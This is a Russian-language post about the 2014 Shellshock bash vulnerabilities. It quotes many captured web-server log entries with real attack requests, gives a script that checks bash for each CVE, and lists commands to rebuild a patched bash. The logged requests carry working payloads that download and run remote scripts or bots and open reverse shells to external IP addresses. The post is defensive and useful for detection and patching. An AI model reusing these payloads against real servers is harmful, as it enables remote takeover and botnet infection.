Обнаружены несколько уязвимостей(CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187) в bash.
Уязвимости позволяют выполнить удаленно команды на целевой машине.
Уязвимость присутствует в bash от версии 1.14(1994 года) и до версии 4.3
Проникновение может происходить через sshd, модули mod_cgi и mod_cgid сервера Apache HTTP Server.
Вот такие запросы посылают на сервер:
"GET / HTTP/1.0" 200 314 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" "GET /cgi-bin/test.sh HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" "GET /test HTTP/1.0" 404 202 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\"" "GET / HTTP/1.0" 200 314 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "GET /cgi-bin/hi HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" "GET / HTTP/1.1" 200 314 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"" "GET /cgi-bin/hi HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/ji ; perl /tmp/ji;rm -rf /tmp/ji\"" "GET /cgi-bin/hi HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\"" "GET //cgi-bin//he HTTP/1.0" 403 29045 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://89.33.193.10/ji ; lwp-download http://89.33.193.10/ji ; curl -O /var/tmp/ji http://89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\"" "GET / HTTP/1.0" 200 314 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "HEAD /.bash_history HTTP/1.1" 404 - "HEAD /.bash_history HTTP/1.1" 404 - "-" "-" "GET / HTTP/1.0" 200 656 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "GET / HTTP/1.0" 200 656 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "GET / HTTP/1.0" 200 656 "-" "() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/195.225.34.101/3333 0>&1'" "GET / HTTP/1.1" 200 656 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" "GET / HTTP/1.0" 200 656 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "GET / HTTP/1.0" 200 656 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "GET /cgi-bin/hi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" "GET /hacker.txt&sa=U&ei=JHspVNnGLsPx8gXS-YHoBA&ved=0CIsBEBYwFjhk&usg=AFQjCNF4L3D_kahVPJ1hhDDzMpo5jsvAbA//cgi-bin/env.pl HTTP/1.1" 404 344 "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";" "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";" "GET /hacker.txt&sa=U&ei=WoUpVO32A8yk8AX72YDYBg&ved=0CP8DEBYwXw&usg=AFQjCNEVbkpRD1WHaQMVRkPmLtMYF2-stA//cgi-bin/env.sh HTTP/1.1" 400 226 "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\"; \"system('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";" "() { :; }; \"exec('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\"; \"system('/bin/bash -c cd /tmp ; curl -O http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi ; lwp-download http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ;rm -rf /tmp/cgi ; wget http://xr0b0tx.com/shock/cgi ; perl /tmp/cgi ; rm -rf /tmp/cgi;')\";" "GET /cgi-bin/hi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://89.33.193.10/ji;curl -O /tmp/ji http://89.33.193.10/ji ; perl /tmp/ji;rm -rf /tmp/ji\"" "GET /hacker.txt HTTP/1.1" 200 700020 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\"" "GET /botnet_hack.txt HTTP/1.1" 200 1054859 "-" "() { :;}; /bin/bash -c \"curl -O http://89.248.172.139/ha.pl -o /tmp/ha.pl; lwp-download -a http://89.248.172.139/ha.pl /tmp/ha.pl;wget http://89.248.172.139/ha.pl -O /tmp/ha.pl;perl /tmp/ha.pl;rm -f /tmp/ha.pl;mkdir /tmp/ha.pl\"" "GET /cgi-bin/load.cgi HTTP/1.1" 403 16813 "-" "() { :;}; echo `echo xbash:test`" "GET /cgi-bin/gsweb.cgi HTTP/1.1" 403 16813 "-" "() { :;}; echo `echo xbash:test`" "GET /cgi-bin/redirector.cgi HTTP/1.1" 403 16813 "-" "() { :;}; echo `echo xbash:test`" "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/104.192.0.18/8888 0>&1" "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { ignored;};/bin/bash -i >& /dev/tcp/207.240.10.1/8888 0>&1" "GET /hacker_bash.txt HTTP/1.1" 200 5818 "() { :;}; echo; /usr/bin/env wget http://92.243.89.208/robots.txt?for=http://www.designsim.com.au/hacker_bash.txt -O /dev/null;" "() { :;}; echo; /usr/bin/env wget http://92.243.89.208/robots.txt?for=http://www.designsim.com.au/hacker_bash.txt -O /dev/null;" "GET /cgi-bin/bts.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://100.42.30.34/lex ; curl -O http://100.42.30.34/lex ; perl lex ;rm -rf lex\"" "GET /cgi-bin/btw.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf sa* ; wget http://100.42.30.34/lex1 ; lwp-download http://100.42.30.34/lex1 ; curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ; perl /var/tmp/lex1 ; rm -rf /var/tmp/lex*;rm -rf lex1\"" "GET / HTTP/1.1" 200 656 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget www.freistilreisen.de/jack.jpg -O /tmp/jack.jpg;curl -O /tmp/jack.jpg www.freistilreisen.de/jack.jpg;perl /tmp/jack.jpg;rm -rf /tmp/jack.jpg*\");'" "GET /cgi-bin/btw.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf sa* ; wget http://100.42.30.34/lex1 ; lwp-download http://100.42.30.34/lex1 ; curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ; perl /var/tmp/lex1 ; rm -rf /var/tmp/lex*;rm -rf lex1\"" "GET /cgi-bin/btw.cgi HTTP/1.0" 403 16813 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf sa* ; wget http://100.42.30.34/lex1 ; lwp-download http://100.42.30.34/lex1 ; curl -O /var/tmp/lex1 http://100.42.30.34/lex1 ; perl /var/tmp/lex1 ; rm -rf /var/tmp/lex*;rm -rf lex1\"" "GET /favicon.ico HTTP/1.1" 200 894 "-" "() { :;}; /bin/bash -c \\\"cd /tmp;wget http://183.129.218.147/a.pl;curl -O /tmp/a.pl http://183.129.218.147/a.pl ; perl /tmp/a.pl 69.65.41.24 8448;rm -rf /tmp/a.pl\\\""
Скрипт для проверки уязвимости:
#!/bin/bash warn() { if [ "$scary" == "1" ]; then echo -e "\033[91mVulnerable to $1\033[39m" else echo -e "\033[93mFound non-exploitable $1\033[39m" fi } good() { echo -e "\033[92mNot vulnerable to $1\033[39m" } tmpdir=`mktemp -d -t tmp.XXXXXXXX` [ -n "$1" ] && bash=$(which $1) || bash=$(which bash) echo -e "\033[95mTesting $bash ..." $bash -c 'echo "Bash version $BASH_VERSION"' echo -e "\033[39m" #r=`a="() { echo x;}" $bash -c a 2>/dev/null` if [ -n "$(env 'a'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then echo -e "\033[91mVariable function parser active, maybe vulnerable to unknown parser bugs\033[39m" scary=1 elif [ -n "$(env 'BASH_FUNC_a%%'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then echo -e "\033[92mVariable function parser pre/suffixed [%%, upstream], bugs not exploitable\033[39m" scary=0 elif [ -n "$(env 'BASH_FUNC_a()'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then echo -e "\033[92mVariable function parser pre/suffixed [(), redhat], bugs not exploitable\033[39m" scary=0 elif [ -n "$(env '__BASH_FUNC<a>()'="() { echo x;}" $bash -c a 2>/dev/null)" ]; then echo -e "\033[92mVariable function parser pre/suffixed [__BASH_FUNC<..>(), apple], bugs not exploitable\033[39m" scary=0 else echo -e "\033[92mVariable function parser inactive, bugs not exploitable\033[39m" scary=0 fi r=`env x="() { :; }; echo x" $bash -c "" 2>/dev/null` if [ -n "$r" ]; then warn "CVE-2014-6271 (original shellshock)" else good "CVE-2014-6271 (original shellshock)" fi pushd $tmpdir > /dev/null env x='() { function a a>\' $bash -c echo 2>/dev/null > /dev/null if [ -e echo ]; then warn "CVE-2014-7169 (taviso bug)" else good "CVE-2014-7169 (taviso bug)" fi popd > /dev/null $($bash -c "true $(printf '<<EOF %.0s' {1..80})" 2>$tmpdir/bashcheck.tmp) ret=$? grep AddressSanitizer $tmpdir/bashcheck.tmp > /dev/null if [ $? == 0 ] || [ $ret == 139 ]; then warn "CVE-2014-7186 (redir_stack bug)" else good "CVE-2014-7186 (redir_stack bug)" fi $bash -c "`for i in {1..200}; do echo -n "for x$i in; do :;"; done; for i in {1..200}; do echo -n "done;";done`" 2>/dev/null if [ $? != 0 ]; then warn "CVE-2014-7187 (nested loops off by one)" else echo -e "\033[96mTest for CVE-2014-7187 not reliable without address sanitizer\033[39m" fi $($bash -c "f(){ x(){ _;};x(){ _;}<<a;}" 2>/dev/null) if [ $? != 0 ]; then warn "CVE-2014-6277 (lcamtuf bug #1)" else good "CVE-2014-6277 (lcamtuf bug #1)" fi if [ -n "$(env x='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then warn "CVE-2014-6278 (lcamtuf bug #2)" elif [ -n "$(env BASH_FUNC_x%%='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then warn "CVE-2014-6278 (lcamtuf bug #2)" elif [ -n "$(env 'BASH_FUNC_x()'='() { _;}>_[$($())] { echo x;}' $bash -c : 2>/dev/null)" ]; then warn "CVE-2014-6278 (lcamtuf bug #2)" else good "CVE-2014-6278 (lcamtuf bug #2)" fi rm -rf $tmpdir
Необходимо обновить bash, для этого необходимо установить самый свежий bash из исходников:
curl -O http://ftp.gnu.org/gnu/bash/bash-4.3.30.tar.gz tar xvfz bash-4.3.30.tar.gz cd bash-4.3.30 for i in $(seq -f "%03g" 0 30); do curl https://ftp.gnu.org/pub/gnu/bash/bash-4.3-patches/bash43-$i | patch -p0; done ./configure --prefix=/usr --bindir=/bin --htmldir=/usr/share/doc/bash-4.3 --without-bash-malloc --with-installed-readline make && make install